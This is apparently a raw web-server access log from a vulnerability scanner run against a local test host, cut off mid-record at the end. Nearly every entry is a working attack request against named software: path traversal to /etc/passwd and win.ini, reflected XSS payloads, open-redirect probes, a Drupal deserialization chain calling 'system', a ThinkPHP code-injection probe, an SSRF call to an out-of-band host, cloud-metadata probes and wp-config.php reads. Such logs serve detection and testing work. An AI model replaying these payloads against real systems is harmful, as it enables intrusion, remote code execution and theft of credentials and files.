"13/May/2022:16:36:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"proId=1'&addToCart=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /action.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /thruk/cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.193","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"127.0.0.1/thruk/cgi-bin/login.cgi?thruk", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm/system/panels/page/preview_as_user/preview?cID=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"{\x22code\x22:\x22test\x22,\x22state\x22:\x22test\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/login/oauth2/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.003","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.snyk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://c9v8hs0smpv8c6ag07h013sxp9xz3enow.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.681","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.562","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", 